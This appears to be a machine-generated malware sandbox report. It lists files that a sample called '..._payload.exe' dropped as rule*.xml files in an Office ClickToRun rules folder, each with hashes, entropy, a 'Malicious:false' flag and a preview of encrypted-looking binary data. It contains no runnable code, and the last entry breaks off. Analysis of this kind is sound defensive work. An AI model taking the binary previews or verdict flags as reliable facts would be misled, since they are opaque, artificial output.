                                                                                                                                                                      SHA-512:7E9C9503E4EE82C9B754E05CA8A5A6FEE8C673E443504281463A1491C408AA94E8D46207580AF30BFCCEA2D28B69CC51B3E104A40D568F6E5EAC1C4BFB415DE9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...G.".%..I.....+`E..%E.....<f.....[..+K....kGY.<...<....e...XW.].+..n..{)..8..*.]...F=.K..?.........RV$,;.m..(6.;X.......n.D;..=.v[0.".......j.Vg.E.u..r.P2.N..7%.~.x...e...$...;r.i.$U.2.P.....u....D.+Iq...J..|...E...I.."!J.C.|I...c.!...v.X.S)4Mt...C,5.....}Xvy..&..b..k.C.g. ..W.?/N....3....$.>..?..f.........+.q....r|..&.K|J.z.t4......2.N......)E.._Tm,......Z...yl...5.4..v..d...(a. ..............W....X.c..<...,%...{..D.iH>...|^..v...f.s*j.\\..M..z.q.A#0....U....z.L.{....W...".m....%...4.a.......w.?..."..O.Q..Ch.L.....@....zJ..P.K..F....q..qL...2..[3......k.:.`......iFA:.....D.BW.....2.?...[.,,..C9=}...%#R..Z.{...}P..#....HJ.4.F..[_g.v....c<......-.v....{....6......dAm...mG_..M....<K.......>...i...ma......j_7-..........P...._C..`.Y.X.&...i.'.....&.@.Cj8.......tD....Pb.....m........5/.........Z.....]{.bg.J}..............O..c...\../3..r:..SVS..T....}N.N....:'.m.%.&p...rf[{...(.l..Ry.R......b....:j...\.x.D.oPn....Q...$.o{.5.*.&.5..($`..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702801v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1725
                                                                                                                                                                      Entropy (8bit):7.887405747373458
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:NbT6SgwHRqijZ/51kif3IObSBYVTpziU8dQbIX7oBtRFuDdaD:NkNU/51t1SB6pEOIIR4y
                                                                                                                                                                      MD5:544EED06B0265175FD214C9E96115F4B
                                                                                                                                                                      SHA1:FB21E2EAE31AECAE7FBA010D58148E655D3EAC38
                                                                                                                                                                      SHA-256:20C39503D504844682C345A92A4CCC3BD69DA05A73C1D43E106CD5D7A68DD3E0
                                                                                                                                                                      SHA-512:1D517FECCD3D13B85DF5B6E6F06DD44839079988E40D3987CAF3B6A59D30E8E52D2F12AF55BE5939F543F1D5CE801C0F4AD3BCBE41CF2EB032493EB883FA53DC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?P...}.p.8.....j..'.s&...5}.=...5..bh....Z...B..t{...O.4Y.Y.d..4e.....b..y...h:O....~..J..l-.|6u3.~. ...Q...$F...X..L....m.)a....H,$...*.(....#.....V......-......YD..Q.....gV........3.J.c.wM..X5..&..m.j^5.BFm{N.....3.O#.*:o!On....4q....T.._5/}.}..)[.at4..l6..8.[niI.v......C.C.}Q+T.....>r^ e..,*.......oP.'..MU..OD....|X.eU.>..l...b.?...\.....*....._......w...R.d.[.M......AM.Mh...._.).. .-.D?.<..?...R\.C....u..%QUF..,...%.....<..H.|.r1.VN....5..m.>K..I...N..*..~n*...@f..v...|..D.n._.....Q.d.,..:....7..,.Z..[..|.$x.Sj<ZB...<....r.n..(Z.>k.[...G......S(..2"......g.....A...u...........+y.2@..~^8..*....,..O8..M....e....$.u..l..e.Av.5.%".P..c.\..w`.<..".PW..TG....H...\.a.|.&..5......j>.*...J..c,..O..DA.S..y.\......[..X.....S...!.D{.]..L...6.r..-.Z.{....>.8.l..t..2k.`....x.|%F_...o*.m.!.;..U...z....Q.r.8#.......;'...]@....@..n..B....uF..?..O.,.D........y.-.o.eQ.j%...v.B{>Mt.+{...Jt..P^..;.g]ye...w.S.q..>...$..#I..7W.A..r...9L..E1hK.3.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702850v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1702
                                                                                                                                                                      Entropy (8bit):7.885968890136995
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:87hE8m4p3RpPTGz0gjZsLy5klpeIlevP1IjHXD:yXSnjZsr3ek
                                                                                                                                                                      MD5:AE7D04FD90574209805CAF994B235341
                                                                                                                                                                      SHA1:00D20C923AB3A1AE96B3EA8FA1303BA8A7AFD0FE
                                                                                                                                                                      SHA-256:9F388DDFAFE467E823EB62E6DB76751B3BF0BD7B165E5E020E7B0FFC3A5BC671
                                                                                                                                                                      SHA-512:B463C6997163BF910E9E8B9BB954A270274EFA348F9A74A630B31209F5BB62C308AC85008C2F75190D78B785FE38B106BF64C04B8C1BD41D271C405D896171F2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...#"...7.V.>V.U|J..E.K.......=C....AY...4T6@z.~..Fk.8aSD...K...........d..'.Pj!.>.y...f...,....g..H.f-q+.._t.:...o.0..L.c..z.|....?..........gKWC)......%....R.R_.2|.q_GBH.21....[|....i'I.)..].V?[)=l._.....(.C.Q.b.....$.......\./..D..0..E.3!J..M.e....0....P....{....?..Q.V6v.G.k.0V. .......{......o...........Pw$..u.........C..$tO.jH...j..|.d.:.{.c9....o4.'.5...r .M......'...5..R''c..Z.B...v.....R..{o(.>$.]/.:u............Mv...%+.4i........j.<..v.N..a.....O.1....w..3L..LcP.g...7K..eA.O.*+,..C.Au..]E.#..'$........N....]1.u...%..1.........1.z.7jDC...u.._a.).......x..r..A...r..M.....0.,,*.......'.V...9.|T......O...t@.o.b..|#.]m.L.E..1.fK<....L..u..j?m .<S.:$....p..}|..W..X......\O"!.m.@.......3.T.r94R.....Tz......S.x........vZ.;....k..v..&.l..O..#.<.SE...pn.M-T.` .\.d-p7...S.,r.=.4n-...D1.._<.....[......$._k..c"...F.......[O....v9u.ie`...s.q.}..._s..&....<2....W\.......;HE9..+....19..5....s..1p.1..2.#\..$#*q}...Y>S'.T.....<tj_.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702851v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1739
                                                                                                                                                                      Entropy (8bit):7.891308106916301
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3CX24Mpp/0pQGrh4tQ/PL4G7K799Y8xybaWmL+8M3XdfFnB1saQe2bD:Y24Zh4K/EGO799Yh7ln9z1sJFD
                                                                                                                                                                      MD5:BE128F490AADDA481AFDF47BD47069CE
                                                                                                                                                                      SHA1:92D3C2F66FF65C2A66CABFE446D84AC379CF12A3
                                                                                                                                                                      SHA-256:BB4C2AB9A1EB1140E7F8C3EC835854768CFA3591EC9AAA521809549C81C60006
                                                                                                                                                                      SHA-512:8A6346430BE682032AD3CC07692682E0055AFB08853A3FAC44DFF8FEEA4B6271EF8D851B726BA5068396B2088A5DF4FE0D41424393323C87CCE02B1C9D1D442B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...s}.yY....U.e.B.P.eb.%.........2.8.5[K...j.........D..;.]9...l...I.....G......"..........Uy_..![*.`l.D...'.......O...1.4Co!I..!..b.!.b."v.........e,...g.d.f.wI(....@6.g.OfQ.....?s.......u...NYkw.S#...*.+I....'uc)W.c.f.f.lL;|<$.$"......g{..F.@iY.x.~qb.......&.LF.. ...z..Yz..}..0..O.p..szZ..KS.D.v.Q...N.....@`.!O..+;Y;.u..... ..G.7.0..9.v..j@...P....6......^hz...t0.(,R.....<{Sy..N.b.i...G.]...n..+).!...7....&.4s.....SN.... .I.9JON.s(..X.Z...m*.Q.fJ.-.r.N.u...H.V.*.....`.?K..ih.SD...D.'......... ..%..\<^u.......L..q.*'..f..T..z.Y:v.8.G..~.5NM...Q.......@={CE....o....M........k.|...!.O....+.L..;....ps.3a2<..m.O...../5.+..G...Y'z.k...M.x6....(..r..rA.<...{2.c...%..F. ......9.....="uL..).f....'.w.Ug..tUz.$..........I.i..k"U.KY.~..x1..x<g..~...S,..........jC(.5..(.Q..p.#..K.I.p.....A.K..c$....../..Ba@..t".<....@.e.-.,.om.B..hE.f]B(.X..zam..!".O...Y....L..3..v.....RD.."8.....^..jE.C.....^}.^......R....Jm5Y.....S&..........5....d....V.!..,....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702900v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1708
                                                                                                                                                                      Entropy (8bit):7.8624270310646835
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:H5iCOd0k59Sn2Ma8HuJfOLwK8TZisQIgFplxlJD:H5yF5w2J8QfOmTZhjAp/
                                                                                                                                                                      MD5:C343DEB26A747103CC1610DC13B8D271
                                                                                                                                                                      SHA1:1C25F1B1DB5FE7DF682D959D123DBFB4428C7569
                                                                                                                                                                      SHA-256:46AB50C54561DF7CF0E1244ACFD2492B5B95B505EE24B7E50692D2D258E29526
                                                                                                                                                                      SHA-512:C44969A535DD2E8DD58828715E13F13D0AD8AD18263EFF92336CF2E9D1105B130D7D87215CCF9585F059F0C036E88563C254E0E8DB86EA87590475F45F18D861
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?....(.+...Q..Z.Q`.YyiO..._<.H.s....9"n..dd.$.A.?...,a.LM......E....@.UF.0.x..N.U.I.p.(P.s.S.oR.~xX...:.L....5....m...+.L.yW......jE......{?.*P...F..+X..5Y,_..w$....!..K95..:..>..;"GC..Ss..E{..3..u.3Q~....I....R...s.5|....._.....n.>.F.~*........+,&.j..j.=....~....G......ae.6...j.~..Img......h.y.%^jLd...`......5_.../)X.|BI.......h.3@KE<F..-..iU..H.I' ..:j..oZ.J......}.R9.<..X...D...u....yU....D......O...r.....F...)..A.[szX.Q..N...4sA-....O.dE0....1...{....8.H....^..k.?..|...T.3.$s...rGe.x....a..R;-..26.....No......d.....]W.R.._q......Cy.:.....BH.......f..K......`....Oc..V03..'u..,^.Y7.BG.....M3_^7.q.~....Feo.../.*K>k..[.B.0..'3r..U-..9.O.t.ffU.v .{.u ...G.9...$....&..h0..~.0Q....`..+........5..6X....Mo|T..w....n..\......q(m-_=25...H..q=AX`...yXA."?\.+.N:stx....h..8.A... X.....#.9...E...>].X^...._f...t.M.A.]..Z&....T&f...2#...uI...I.].cBP,$..59D.^...D.~c.-..>...]...z..D.3.....A.zR..N.Kh.J9`.^J.........R.ma..L..+..Q.+D.~J..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702901v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1745
                                                                                                                                                                      Entropy (8bit):7.881421027556349
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:FoaW27VVLli6J8Mm5OrsQqSOFzZB39v3D:+8VVLl5l3LqvPNr
                                                                                                                                                                      MD5:C124A4C5A1386544917034AC707F59EB
                                                                                                                                                                      SHA1:8D2ADDB8109708DDF9ABB001448F6FB3D31D34BC
                                                                                                                                                                      SHA-256:DA2A12BCAC0A0F04A5BA3EBF0165AFABE0C3389ACCCCD2AB6132F5A7A55B15FD
                                                                                                                                                                      SHA-512:C4BCE104B9740AC7F5B591C5FC1727EA6240985E9ADD78FE943211E7B38F4AEF1B4156ED89D3F6A5244A746583BFA878C2E3AC320879419AAEA185CB1B512D97
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?B..m.......@f>.=..E..W.d.1.<g}:F;..'Q_..]zb..z.YT. j..K..@..@.?M_.|_.... .Fx.FFh.&:.....L.....Zn.@.ug..@..o-{mL[P.S..^.OT....s.%U.BEks..b.....UAaav.n8.d(.3....t...9....z.K..l fT>J..:...:...'.........6H.L:.rO.LN"Z.?....'...>...9F.emKVg....S87..1v.S...R1....b.B..%B.fJ+......z..ti.h..#......FQNeS}>{\.AX.e.$.....H.i.....yPI=..=`^M...........Q.cS. K.2..q..M....".p...k]2.v.[/8OE$.8..../R.Y.b.....dr#.Wc......f*...4.#.^s..1.<....JU..>-..%OT.k..o..L..l..#......`..Y....W...0hC..{.....8.Z%[../.~.U...5.f..t..Q...55..r.N`...>....#A.a..\\.G.Q....2nR...!...%..j..X%..RyZBC..bn.M.6..t...}K..'c[."......O......gC....^OT.D............&3+....{.._.h^:.)...;....#".."}....H...2..5V../28.q.E.~...5]i6..7}M).W.l..E...3.Lv..5.H$8[..d...j..Knlr.l.fg.....Pc.3..F....T.\..0. Z..U8.L...:...[.J......1.uxjk..K..#..y_Y...6...........{..]cb{....saB.I.]M..FLo...@..2...B.M..5...j{..D@.9.u...u........6 r.*.s......S...5.V69.X%..1....OYg...&..q...Q[.'e.sJ3.jQ..(..L..&.i.~.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702950v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1702
                                                                                                                                                                      Entropy (8bit):7.873244028120215
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:5HQyuZcCch8RnXM6JdO4lG0W/G0/+hiA5xAM0hbU89F5H4D:5wymE8pXpJ8bmevHk
                                                                                                                                                                      MD5:1394DF3D5AE766B465AA97238384B068
                                                                                                                                                                      SHA1:4697D32D34F84ECE49EBF66CAAAFDA3CF3D77507
                                                                                                                                                                      SHA-256:768A0D4865E2F1A8660315900C91989C8251C601594B54AC312B091A3EB45882
                                                                                                                                                                      SHA-512:4CDEDD6DAD02BC97F162E4B10462070E9D9ECF369E1D2FFE154266ECF52D366277F04E3A4F7756755494C6EFBCEFF745ABC10772FEB048C0E576A9295515627F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?Zt...s...k.........l..p4r...].`...y.b...K.R......|...s..D..B.D.(.c.a...d.*...-....Y.-.......x.!.....t.Hq:.>..BW.0....O.........\.<...8&...K.".%..L.....p..p...|..u^k..4...^......8#6.....-..bH9.s..t..k...:...%hq\...%\44<...t..X....~.....W.\.(.......F..W...]........f...J....P|.48..`....z;?$GZ.... >.d...R.@.... .@nkeiO..$t.+.9....h......%1.9...i..B.....d.5..=...'....}...."}.........h=.`.~T....M.....F......._.e...`x.{.h..W.....57..QY..z.....L..:....{.J.....>.bq..]..o.yj.d.e.:..X..b\....'.a........3Pi../S...X..+..:....2.8-?...Q....%.N[v.b.m+...)v.....mc.5..J.j..f.H]..r..7...>.1.. .a...Z.J.{....ng..[Z...!.,..&c*.....g...v...(~.~.{......VS'{..h.8.:..iVr.6|C.@.g..#.E.#...m....R.....o4..qV...Vq.m...q!.5.5J...,.k&<.@C.o?..T19.F+.J9..........]....O.....*azf.Bw...!.h.[.K.]'.h.2.:....9l5By.K^.iA.Fj".17+7O......c..'..~$.$.5..p.7...!qU...................YF#.<6.1............II..e....6y_..h'.qmSN.....P^...|..D.B1G....@..:..5.0x............c...@....j.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702951v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1739
                                                                                                                                                                      Entropy (8bit):7.892314522877132
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:JDHkmJ23C5i4KM30FYfJNdmUMVRotiN6g9E8DkD:dHkv2BCYfJyEtiNr9E8Dw
                                                                                                                                                                      MD5:7889C7B53543D2B0864BE999D3A532AA
                                                                                                                                                                      SHA1:D215789AC1CB56DA7EE410933851FA1C39B7B78A
                                                                                                                                                                      SHA-256:CB1C0C6B5C149C97D49F5807DD2A79405C069A5BA0D1FC9FE2F4055C64143A7A
                                                                                                                                                                      SHA-512:3E266B06A7FBE86582B1301A19118BBBB88242968461250F0F3B3163EA0A64FBE7D5A287FC2B25B6F9AFC3287FB73E04381A966DA56B1C23E4DDB0B97FD3BDCD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.m..8<.....E.\N..1aq...e&.(.....7.....,.*..g/`91..V.._...F.....Z.qV...5..%.I......a..Pa.U..{EB../...g..9......w._e...i..F.i.....k..$..:.Rc....`....Z....W\g.<F.3.X....Sf..J....$.B.....C.*...q[.gTp\/KZ{T.."....>..9&.]Y.w....7...........z!........a...]........f/~...D.zl.v.vu.....E...h..)#..r@(?.~<.rP{.eb)..N.t..c..R.r.*mF...f.:.......~q.......... .=... ..ME.....k.!T.L.5....s.]......C\....),.....Q....a.P..X,....]j.P|.By.-...8...N(...o..p0...!........=..RH..HM.z..0|......!..J.9..J[..O2v._...:.....).)S.t.....A..RCk!7.......F...M...l..iMGW.....w.....,.%'.H.R.....Y......p..l$.g._.R..:.YA....tKYb...RK..w.H%.K.4..e...]..b].....=oq3.L....nLgFw0vv..{...!c..ain..5...l...|..2R...3>d.^....#..X.a.6..../.......+.5..I..(.Y..#.%./.,.xx..Ep...c%.Z........m..i@.......aGNA..iF...|.G......."M...[..y..J...K..:.....$u1-.j...x.(....N.....!n.o,.L*5Z...|...-.]Q.0.b,}.2..:...I...&..?..F@q.d..J..Cf)....H....f.*d...G.+S.........<wZ...+.J...D6.yz$.[h8.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703000v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1703
                                                                                                                                                                      Entropy (8bit):7.895653768698926
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:/Dwz9f2unPSe0DshQnGbeokCOGntA7hgjxbR6+6ZOZg7u8UcAgnKF2bD:/DAf2SSe0DshQnGy+ObOj1A+6ZOc/npD
                                                                                                                                                                      MD5:8B655D77268F2AF0A35765D866DBA9E7
                                                                                                                                                                      SHA1:F2ACFCF34F94CDE4A57192E7F8AAA51FA903A734
                                                                                                                                                                      SHA-256:6957880F6F51D3DD78FB327C7BB6410182E8D7594DA3EAEE0E0DBB0D1F930429
                                                                                                                                                                      SHA-512:ACA16157E52F3F0655BBB515C9A3825BCC8B3A0A43BEABCD30CDC56AEFA79C656005489D9F45F4CC9AEF4D4AAD415D6FC0FD793051CE28B7965DCA6E62FE9B5A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..Q..@.. U.j....N..r...O.W...`.....(..].....j"...*.J}.L]..,.h./1.L.V..t..VR..8..k...5).0..~.B.......K..h...i...>......R.C..'.4..6.|.f~.U'.Q.b.Vre...9..g....sZ,.....<....x....T.IrFX.._...S.......AOXZ...3....xs.#.........Q..VFH.!......dv...p..v=....zV..*...`..^.. .]'.;.K|.T..2*..$.@.:..j.m.'...aJ..g.;..g...3ca.|k.c.DW...;c....`.N.%.lG.5@5....:._..&...L....ja=.....$..hp;.!....i.c........;..F....V/./3..Q..3...jV.b+=...mt.m;".9.LMz...B..`..... v.w..R.?A&...Lz.R.......*.qx....-....V..Mx...@I^%F...a^......]..C..61.....u.c....[..\"^W[...1..N.V..J.&..H..*x...c;...).0\.^,.K..]....?.....h..P......V...U{.._..EJ.=e....a..U...n#..M.;.x..{.\....c...........K....Q#.i[.........U U...J....M.^bG'..-Q.q.Yu).......j........Y:CbJ<>..q..xR.qP.........o.~3..+`.ph.j`...]q...9Yy.e..3."J.B.n.e.I.Q..$..=n'.P.W.... g..i.S...e...H.RD....|H.E...-@.9.r..F](.'.{...!V...,.b[0.8].X.B..[..l...f..3..w...L..*\......J.#q(.D..>..+M...w?...>...IW....[...i..s....+.T.V...V..!.CS

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703001v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1740
                                                                                                                                                                      Entropy (8bit):7.872731526133371
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:n0eIbSWCYNPOIAVNwztpJStmN7+b9CtkFa3WZfZfD:nMSRYNWOnQSSxCtkFNfZ
                                                                                                                                                                      MD5:1FABAABFBE90B3B1DC39690BC2613B0E
                                                                                                                                                                      SHA1:08B684038E5B44605B50BB9F9EC18A47CC52BD2F
                                                                                                                                                                      SHA-256:D9318920DEAE5D3030CC6C0DF417C7599650BD008A72ABAABADD7478CF25DD15
                                                                                                                                                                      SHA-512:E9F1C29D554CF4B5A98985FBBBD38305D6A8896B60AABFDC1720BB1C660958FB5152790529A5D5BF6AD638709A271BBD35DBF9DBD82885DB0DDF8D1E5EC1408F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?=wT.uO..yD..Py..M....S.iC.o.....:..0..#....../zSA..;...cv....8.....a......z..A.8K.T....B55.. .3.8..gZi.........3c..*...o.i...>v..A'...Z..k...l,....M.....*!....+..^....1.[..;...(+h..B.0..*vf..3...@..7..]..B......S.%......BuV..3..}.-bw.......j.U.2.i.)f..S.>Q&.....*.'M.yb..l......Ag..........17...XvtH,{|..xF..H.P.@.d.l{QC...T...J...S.h.c.f'.$.....".@&..Z.D..0...xeyk.?...!.F..=.. ].#...*.`.8.J."%V..U 9...L.#*..H...;~..<..G.5.%k.....J6.fI........7...h..*....5P../..o......:..U..T.S....pz..v.J...D.....'K..i....A........T.....vh...1.5..U... ..S..t.\.2.W...O..5.*...."....}..q.l*.)?S..M.F..zA..ks_...5d>%.ou...DAt......./..4..8..Kx...]._....B..s.g.7...M..i.E......\=k.J..af...:.-em.cDk&..G~.......[?.K.._.^...:=.Jz...u.,.BA/....<!2X...[........M......BG.........T(.....+.@9..g.K...K+.&.?..W..G_Z..e+..>...EbE(V..@a.k..7.....x.AV..m.V.E..*z..3<..zS.oh..HX.B.3L....89.~?..|........41.*..3...?.....aY..8\.4Ss'N.........u..T..3..X....L.y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703050v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1725
                                                                                                                                                                      Entropy (8bit):7.871510414801023
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:H64ZSjS8gBRtrOxDqnyBuOWEsN8AbJefYXayGdn8AskcD:HZZ+SPVEzBuODs+qsySekY
                                                                                                                                                                      MD5:609F54DF8501C9777BA3D2B84BE23CD1
                                                                                                                                                                      SHA1:4E30566409C639181ED512DD8426A4B13EE6AE64
                                                                                                                                                                      SHA-256:14FCF458D339EEB70ABB6A50936D4BC3CDB9E85490C9B6E23E95D727BB0186BD
                                                                                                                                                                      SHA-512:481524B02AB40D3FED7DAAF646CB5243AF913A184680F5FC0D59CB793C80341E69E53A8DE10EF6E8B50A0FC3C92B3AE7214472857E8E4ABC412E731CB549AC3A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?x.T..Q7....@A...N.....*6".....lA......H.>"<...-4T<.?.!?M.z,5..>.Vs^....E.:...Z....p..x...2"A3..BD.!A.....P.Ba.2..He.f...h.d....P..7..9...Q3!..GY.$.|m...q.<......b.[....37x..s]M.....L.l=9....h.]#......6.4...6".\09V....^.!|$lM.N/T.Y.N,z.+..A..t..b..la...o2.eW:.^7....wq7.. ....bh........^......0v.,...f.@.{|.6.5../.bU.....e...|..t(d..1.V..j....O.?Q+\.z..2.....t.W.#....&;..b.........Z.5..v.S/.y.....s.N....e.K_...BH.:..&..L.).OP~.H.k.......8....*.em..l..P..li.m..W.8S4.[3T.Wc....k5.38nN..a)...1nR..Dx...5...[O.V<k.(..[N...Jz..-.s....-.T....D^@..."./.....?.......$.g\...3.2f.i..F...,...Z37...-.QRn.......(S.W......sW..Y....l.jy..Q.....EDT.-..7D7...6`.Y.9.$0.xS./......` -3.q.......,_~..d$..V.h...^.H....G.N.T.b.Y.r._!.)..OE4U.r<3..v&.....Ds........!qHf..).S9(.L1l.F..)...#..).DH.h....Y.~-e....Ta..c..]\...........[....e...Rg..l...C^}.p6..XmMQ7:2c....TB.......R.~.AL....&.. ...'...:O....%.3.....d]..B.J...gx.../.:(.......1&`.~...=.?.Q+[..,.:....e...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703051v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1762
                                                                                                                                                                      Entropy (8bit):7.887640590230057
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Cth2JBsqdYtFay0gQJ5oioH4Ba9K48ex6YBHID:CtEf9Y0gq5oxH4B6KckYm
                                                                                                                                                                      MD5:BB99BF379F7BFDE05D13A7BE11D9C32E
                                                                                                                                                                      SHA1:821A9A4B7B96F6EB827947D0FFB075270F34EAFF
                                                                                                                                                                      SHA-256:B0C21EA39064E1FABFF49BE865F135DB034B8CFF1E98A4D636EB9057E94C545A
                                                                                                                                                                      SHA-512:283F66C059C3832F96F7E174A93D2BDF060AA6F11CB82CC32127343B79590ED3BE82493002593DF934DB4373189724DB6F733A2E29071E033B715DF1CC752618
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..]`..A..E^..e3.b.%.....&.E":.+.4c;.:...0....Yf.|R._].RK.i..-.]svt3Y&..>_.....Y6q.4.?M...a.|..W;..k..........O,..>{.I....W.r+('..`.<....2...W...;.y..,.?.l..6.]...k..N.,......Dm.@.....".]lD....<{.,5.....^..b.H&R.....".)...s.i...3..@..$...V'lr..+.$f.@.>..X.z...6.;%2d.y.....:4.vGn.WJ~...y......[...T.g.x8.-.)..:Y.... 9,`......0.`.Q...tFF...X......zeO.~...).c.F..V...N.\.k...!..Z..=.|...k.i.z/`.7.).6.|...tO.,k:.E.e.gB.j.......q..14O.r.)[..H.+(X...b..x..3L.....7].I@......i.D....^.N$..6.sC.#.~0...Y..z.u_K...JM.`W"..u...*..a.L.9.V./...-0.^.Z...{.........G......o.m.H..,.W...e..........9.A.\.<..5...'..N......51s1@CjQ6..sF?_KC..Y.}8..A.G...8k..#..g..sK...i...Y....U;"..A..jP....b,.Q..:.f+...R....`...UY.c....]].;.'..g..|...3S..e*pO0..UK...b.N.J..?...#../.@...G?q.@..kc..b...+..f.i.E..g..."e...c...@.....x..*..U.Fy...K).X[..2...\y.v.X..;.CD..m.]...i.vZY. ...........,..7.F....2.t......{".........e"_...%...3!.v.p..f....s...^3.&S..$..\T.n..r:,6e.'...*d...l[P...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703100v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1690
                                                                                                                                                                      Entropy (8bit):7.886734261087463
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:BtGcbcTIP9BqwvD8+Cjs/I8OGuxdZLDirzuwTd2swnvUGvRhKoLmdDZXDraX0nx2:bxlP9nwPXjjDNwTde8gKo6TaX9OQFD
                                                                                                                                                                      MD5:354B90EE3C7ABC24DE8BE23683C28B61
                                                                                                                                                                      SHA1:9C8FEBDB01585406CBDB8A2ADC8F3D025B155DB9
                                                                                                                                                                      SHA-256:2C462574E6BBDE116B425ED2C3C6961B7C22676A32A06741CC94BB237665722E
